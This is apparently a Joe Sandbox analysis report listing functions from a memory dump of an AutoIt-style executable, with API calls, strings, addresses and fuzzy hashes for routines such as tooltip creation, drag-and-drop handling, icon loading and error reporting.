Instruction Fuzzy Hash: 7C819F7110820A9FDB15DF54C886FBEB7D8EF44318F18846DED899A092DB34DD45CB61

Function 000CABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 000CAC33

Strings

CLASSNAME=, xrefs: 000CAC70
LAST, xrefs: 000CABF8
HANDLE=, xrefs: 000CAC2C
[CLASS:, xrefs: 000CAC83
[ALL, xrefs: 000CACD9
ALL, xrefs: 000CACC7
[ACTIVE, xrefs: 000CAC20
[HANDLE:, xrefs: 000CAC3F
[LAST, xrefs: 000CACE0
[REGEXPTITLE:, xrefs: 000CAC5B
ACTIVE, xrefs: 000CAC0E
REGEXP=, xrefs: 000CAC48

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 4633d06a2b772cc50fd0fb9b30b988682adfbe2043827ae7d6c8dc480c3d5804
Instruction ID: b74d3bdd1c42035d07855f26d98af678eb4b742825d92e81ff81eecac044eb06
Opcode Fuzzy Hash: 4633d06a2b772cc50fd0fb9b30b988682adfbe2043827ae7d6c8dc480c3d5804
Instruction Fuzzy Hash: EE31BE30E48209AACB14FB60EE83FEF77A4AB11764F244028B40A720D2EB556F148656

Function 000E4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 000E5013
LoadCursorW.USER32(00000000,00007F00), ref: 000E501E
LoadCursorW.USER32(00000000,00007F03), ref: 000E5029
LoadCursorW.USER32(00000000,00007F8B), ref: 000E5034
LoadCursorW.USER32(00000000,00007F01), ref: 000E503F
LoadCursorW.USER32(00000000,00007F81), ref: 000E504A
LoadCursorW.USER32(00000000,00007F88), ref: 000E5055
LoadCursorW.USER32(00000000,00007F80), ref: 000E5060
LoadCursorW.USER32(00000000,00007F86), ref: 000E506B
LoadCursorW.USER32(00000000,00007F83), ref: 000E5076
LoadCursorW.USER32(00000000,00007F85), ref: 000E5081
LoadCursorW.USER32(00000000,00007F82), ref: 000E508C
LoadCursorW.USER32(00000000,00007F84), ref: 000E5097
LoadCursorW.USER32(00000000,00007F04), ref: 000E50A2
LoadCursorW.USER32(00000000,00007F02), ref: 000E50AD
LoadCursorW.USER32(00000000,00007F89), ref: 000E50B8
GetCursorInfo.USER32(?), ref: 000E50C8

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 2b36467f0b784144e8ef7564923e233c9d8921895706f45aba6da9052aaadfeb
Instruction ID: befaaa4f6f8fe5eb337abf7f23e8904d442f3068413151589792f8bf7fea0fe3
Opcode Fuzzy Hash: 2b36467f0b784144e8ef7564923e233c9d8921895706f45aba6da9052aaadfeb
Instruction Fuzzy Hash: 563116B1D083196ADF509FB68C8996EBFE8FF04754F50452AA50CF7280DA786500CFA1

Function 000FA1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000FA259
DestroyWindow.USER32(?,?), ref: 000FA2D3

Part of subcall function 00077BCC: _memmove.LIBCMT ref: 00077C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 000FA34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 000FA36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000FA382
DestroyWindow.USER32(00000000), ref: 000FA3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00070000,00000000), ref: 000FA3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000FA3F4
GetDesktopWindow.USER32 ref: 000FA40D
GetWindowRect.USER32(00000000), ref: 000FA414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 000FA42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 000FA444

Part of subcall function 000725DB: GetWindowLongW.USER32(?,000000EB), ref: 000725EC

Strings

tooltips_class32, xrefs: 000FA346, 000FA3D4
0, xrefs: 000FA26F

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 7828031b035268710ffcc6a6d69392a7a72c408086e1c758792525433b6d1f31
Instruction ID: fe2924e830026e992873e665e06389038efa7c6261744dc0bdabec20931aa58f
Opcode Fuzzy Hash: 7828031b035268710ffcc6a6d69392a7a72c408086e1c758792525433b6d1f31
Instruction Fuzzy Hash: 72718FB0240209AFE721CF18CC49F7A77E6FB89700F04451DFA8987AA1D775E942EB56

Function 000FC5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00072612: GetWindowLongW.USER32(?,000000EB), ref: 00072623

DragQueryPoint.SHELL32(?,?), ref: 000FC627

Part of subcall function 000FAB37: ClientToScreen.USER32(?,?), ref: 000FAB60
Part of subcall function 000FAB37: GetWindowRect.USER32(?,?), ref: 000FABD6
Part of subcall function 000FAB37: PtInRect.USER32(?,?,000FC014), ref: 000FABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 000FC690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 000FC69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 000FC6BE
_wcscat.LIBCMT ref: 000FC6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 000FC705
SendMessageW.USER32(?,000000B0,?,?), ref: 000FC71E
SendMessageW.USER32(?,000000B1,?,?), ref: 000FC735
SendMessageW.USER32(?,000000B1,?,?), ref: 000FC757
DragFinish.SHELL32(?), ref: 000FC75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 000FC851

Strings

@GUI_DRAGID, xrefs: 000FC7C9
@GUI_DROPID, xrefs: 000FC77E
@GUI_DRAGFILE, xrefs: 000FC800

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: c08bba3f8641a8d48faac9b1098ddf2a56a7a25fca915ae669aba8717268e445
Instruction ID: f9efa71fa05152c7042bb3e715dfa7ac33fb13ed4a076d0ec48061dba32c4c5e
Opcode Fuzzy Hash: c08bba3f8641a8d48faac9b1098ddf2a56a7a25fca915ae669aba8717268e445
Instruction Fuzzy Hash: 0561DF71508305AFD700EF64DC85DAFBBF8EF88750F00492EF699921A2DB70A909DB56

Function 000F4392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 000F4424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000F446F

Strings

ISCHECKED, xrefs: 000F45F2
CHECK, xrefs: 000F448F
GETITEMCOUNT, xrefs: 000F4551
SELECT, xrefs: 000F4620
UNCHECK, xrefs: 000F464B
GETTEXT, xrefs: 000F45C2
EXISTS, xrefs: 000F44D8
GETTOTALCOUNT, xrefs: 000F4456
EXPAND, xrefs: 000F4521
GETSELECTED, xrefs: 000F457F
COLLAPSE, xrefs: 000F44B5

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 5868e23f8bc6b8c7f223be2d8c7c3dee5c31b13b886c0adf1382c09154f390b2
Instruction ID: 7bdeb89d8918b53fd3a95c69888de812749039345e3dfd8ed6cbd07ff5169b2a
Opcode Fuzzy Hash: 5868e23f8bc6b8c7f223be2d8c7c3dee5c31b13b886c0adf1382c09154f390b2
Instruction Fuzzy Hash: CB9169306047059FCB14EF10C451ABEB7E1AF95750F04886CE99A6B7A3CB35ED09EB92

Function 000FB7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 000FB8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,000F91C2), ref: 000FB910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000FB949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 000FB98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000FB9C3
FreeLibrary.KERNEL32(?), ref: 000FB9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000FB9DF
DestroyIcon.USER32(?,?,?,?,?,000F91C2), ref: 000FB9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 000FBA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 000FBA17

Part of subcall function 00092EFD: __wcsicmp_l.LIBCMT ref: 00092F86

Strings

.icl, xrefs: 000FB82A
.exe, xrefs: 000FB84A
.dll, xrefs: 000FB86D

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 54ae8e75f4d842c7e899238d674f46168180a22aa722bfb10318e39cab0fc899
Instruction ID: 6b346f6c224b36dc5fb64ed7d0bb20bb12604c02bcee01c4a9993773073ade97
Opcode Fuzzy Hash: 54ae8e75f4d842c7e899238d674f46168180a22aa722bfb10318e39cab0fc899
Instruction Fuzzy Hash: 5F61CE71904219BAEB14EF64CC81FFE7BA8EF08710F108119FA15D65D1DBB49990EBA0

Function 000DDC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 000DDCDC
SystemTimeToFileTime.KERNEL32(?,?), ref: 000DDCEC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000DDCF8
__wsplitpath.LIBCMT ref: 000DDD56
_wcscat.LIBCMT ref: 000DDD6E
_wcscat.LIBCMT ref: 000DDD80
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000DDD95
SetCurrentDirectoryW.KERNEL32(?), ref: 000DDDA9
SetCurrentDirectoryW.KERNEL32(?), ref: 000DDDDB
SetCurrentDirectoryW.KERNEL32(?), ref: 000DDDFC
_wcscpy.LIBCMT ref: 000DDE08
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 000DDE47

Strings

*.*, xrefs: 000DDE02

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 2baf2ac53708907986810bcc8452d1a447ab05f51a26c5d40176feec5dd683ee
Instruction ID: 520a77c34bfecd55430fbfedb9833e52beed420fa76681a38a139e22563f2e06
Opcode Fuzzy Hash: 2baf2ac53708907986810bcc8452d1a447ab05f51a26c5d40176feec5dd683ee
Instruction Fuzzy Hash: CB614A725043459FCB50EF60C844DAEB3E8FF89314F04892EF99997252EB35E945CBA2

Function 000D9C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 000D9C7F

Part of subcall function 00077DE1: _memmove.LIBCMT ref: 00077E22

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 000D9CA0
__swprintf.LIBCMT ref: 000D9CF9
__swprintf.LIBCMT ref: 000D9D12
_wprintf.LIBCMT ref: 000D9DB9
_wprintf.LIBCMT ref: 000D9DD7

Strings

Line %d (File "%s"):, xrefs: 000D9CF3, 000D9D0C
^ ERROR , xrefs: 000D9D4E
"%s" (%d) : ==> %s:, xrefs: 000D9DD2
Incorrect parameters to object property !, xrefs: 000D9D5B
Error: , xrefs: 000D9D81
"%s" (%d) : ==> %s:%s%s, xrefs: 000D9DB4

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 19d9735d524ac581713a28299700b7d93108d520f2a0782c62cb46eef284e404
Instruction ID: eb3fdf6b55899fdc88ac89f506d68d2fcf325c6c9dc78e69b9e4474e104b8de8
Opcode Fuzzy Hash: 19d9735d524ac581713a28299700b7d93108d520f2a0782c62cb46eef284e404
Instruction Fuzzy Hash: 6F518D71D0060AAACF15EBE0DD46EEEB779AF18300F108065F50DB21A2EB752F58DB65

Function 000DA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00079837: __itow.LIBCMT ref: 00079862
Part of subcall function 00079837: __swprintf.LIBCMT ref: 000798AC

CharLowerBuffW.USER32(?,?), ref: 000DA3CB
GetDriveTypeW.KERNEL32 ref: 000DA418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000DA460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000DA497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000DA4C5

Part of subcall function 00077BCC: _memmove.LIBCMT ref: 00077C06

Strings

open , xrefs: 000DA427
closed, xrefs: 000DA3DF, 000DA3E8
close, xrefs: 000DA3D1
type cdaudio alias cd wait, xrefs: 000DA443
wait, xrefs: 000DA482
set cd door , xrefs: 000DA466
close cd wait, xrefs: 000DA4B0
open, xrefs: 000DA3F2

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 4429a7846f4f22cb79fb80c61eef96cdd067f03bb69fe4cf2ef9e05be52c156a
Instruction ID: 20a517bb5ccb5eeedce2b996c318f62078639131ea4f7eb30a3acb3c24b2c542
Opcode Fuzzy Hash: 4429a7846f4f22cb79fb80c61eef96cdd067f03bb69fe4cf2ef9e05be52c156a
Instruction Fuzzy Hash: 78515D715043059FC740EF10C8819AAB3F4FF99758F00886DF89A572A2DB75EE09CB96

Function 000CF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,000AE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 000CF8DF
LoadStringW.USER32(00000000,?,000AE029,00000001), ref: 000CF8E8

Part of subcall function 00077DE1: _memmove.LIBCMT ref: 00077E22

GetModuleHandleW.KERNEL32(00000000,00135310,?,00000FFF,?,?,000AE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 000CF90A
LoadStringW.USER32(00000000,?,000AE029,00000001), ref: 000CF90D
__swprintf.LIBCMT ref: 000CF95D
__swprintf.LIBCMT ref: 000CF96E
_wprintf.LIBCMT ref: 000CFA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 000CFA2E

Strings

^ ERROR, xrefs: 000CF9C3
Line %d (File "%s"):, xrefs: 000CF957
Line %d:, xrefs: 000CF968
%s (%d) : ==> %s: %s %s, xrefs: 000CFA12
Error: , xrefs: 000CF9E5

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: c1b4f1e1df427892f1bff59a27f1ca9062be31415e486ace8016de48a0715b6a
Instruction ID: f1c1b857a026d3b9291ab9745ee81abb4a5928db2c14eb7e04d28195baa75f46
Opcode Fuzzy Hash: c1b4f1e1df427892f1bff59a27f1ca9062be31415e486ace8016de48a0715b6a
Instruction Fuzzy Hash: 60414D72C0021AAACF15FBE0DD86EFEB778AF18340F104065B50DB6092EB756F49CA65

Function 000FBA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,000F9207,?,?), ref: 000FBA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,000F9207,?,?,00000000,?), ref: 000FBA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,000F9207,?,?,00000000,?), ref: 000FBA78
CloseHandle.KERNEL32(00000000,?,?,?,?,000F9207,?,?,00000000,?), ref: 000FBA85
GlobalLock.KERNEL32(00000000), ref: 000FBA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,000F9207,?,?,00000000,?), ref: 000FBA9D
GlobalUnlock.KERNEL32(00000000), ref: 000FBAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,000F9207,?,?,00000000,?), ref: 000FBAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000F9207,?,?,00000000,?), ref: 000FBABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00102CAC,?), ref: 000FBAD7
GlobalFree.KERNEL32(00000000), ref: 000FBAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 000FBB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 000FBB36
DeleteObject.GDI32(00000000), ref: 000FBB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 000FBB74

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: a50f29eb0cbe59ef276de87fbfe93350394200323c8473bd81bbcf2ed9161692
Instruction ID: 15fe2544fbf92e6951d7a0531115c6ae50c6dc20331e30d43e4665d0b37962b3
Opcode Fuzzy Hash: a50f29eb0cbe59ef276de87fbfe93350394200323c8473bd81bbcf2ed9161692
Instruction Fuzzy Hash: 9441377560020AEFEB219F65DC88EBABBB9FF89711F144068F905D7660D7749A01EB20

Function 000DD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 000DDA10
_wcscat.LIBCMT ref: 000DDA28
_wcscat.LIBCMT ref: 000DDA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000DDA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 000DDA63
GetFileAttributesW.KERNEL32(?), ref: 000DDA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 000DDA95
SetCurrentDirectoryW.KERNEL32(?), ref: 000DDAA7

Strings

*.*, xrefs: 000DDAE6

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 64467ce65abf6d43792d26da54e22e635dcbbef21e704e87bc4ab98c881475b3
Instruction ID: a2b8f22daaa39976cf8cdbbbb16d6b64a028966ad4a6287059b351bbc51d87db
Opcode Fuzzy Hash: 64467ce65abf6d43792d26da54e22e635dcbbef21e704e87bc4ab98c881475b3
Instruction Fuzzy Hash: F5818E715043419FCBA4EF64C854AAEB7E4AF89310F14882FF889C7351EB35D945DB62

Function 000FC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00072612: GetWindowLongW.USER32(?,000000EB), ref: 00072623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 000FC1FC
GetFocus.USER32 ref: 000FC20C
GetDlgCtrlID.USER32(00000000), ref: 000FC217
_memset.LIBCMT ref: 000FC342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 000FC36D
GetMenuItemCount.USER32(?), ref: 000FC38D
GetMenuItemID.USER32(?,00000000), ref: 000FC3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 000FC3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 000FC41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000FC454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 000FC489

Strings

0, xrefs: 000FC33A

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

